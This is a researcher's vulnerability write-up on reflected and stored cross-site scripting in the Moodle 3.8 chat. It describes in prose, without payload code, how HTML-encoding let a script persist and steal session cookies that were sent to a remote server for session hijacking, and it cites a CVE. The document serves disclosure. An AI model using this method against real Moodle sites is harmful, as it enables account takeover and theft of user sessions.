Stored XSS + Session Hijacking
Hi, I'm Cid da Costa and as an information security researcher, I’ve made a security assessments in order to find issues on a very popular learning platform called Moodle in version 3.8.
Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalized learning environments. You can download the software onto your own web server or ask one of our knowledgeable Moodle Partners to assist you.
Moodle is built by the Moodle project which is led and coordinated by Moodle HQ, which is financially supported by a network of over 80 Moodle Partner service companies worldwide.
Those Vulnerabilities were:
• Reflected XSS on chat
• Stored XSS on chat
• Session Hijacking
Cross-Site Scripting (XSS) attacks are a type of injection scripts, in major part malicious, and they have effectiveness when an application fail in sanitize your inputs to succeed the attack. This relative XSS flaws, are easily to execute if the developers of the application, don't have the right cares about the inputs of his applications in order to creates mechanism to validate it.
After this brief introduction, I will begin testing how the application handle the input that I’ve pass through a text field in a chat session between an administrator user and a student and then steal cookies and hijack the session.
In the beginning of the assessment, I notice that when I passed a script without any kind off encode, the application applies some input sanitization but execute a reflected xss on the site. I going Searching for a encode that permits the script remains stored on a chat session, I use a HTML encode, from burp suit, in a tab called “decoder improved”, an extender, downloaded from BaP Store. When I doing this encode i get a payload that I use to make a xss that run and stored in a chat session. After that I used this xss stored to run a script that capture a session cookie from the user logged on chat and then a do a session hijacking. Besides that, I sended to a remote server, the cookies that I’ve been captured an stored by a later use. Session hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.
In that way, let me demonstrate in the video below how can i make this attack exploring a simple xss reflected, turn this in a stored one and then elevate the impact of the flaw manipulating the session cookies granting sessions rigths to another user.
Thanks for reading and enjoy the video.
I would like to thank my co-workers for the support they have always given me.
Related CVE ID: CVE-2020–1691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-1691
References:
1 — https://docs.moodle.org/38/en/About_Moodle
2 — https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
3 — https://www.owasp.org/index.php/Session_hijacking_attack
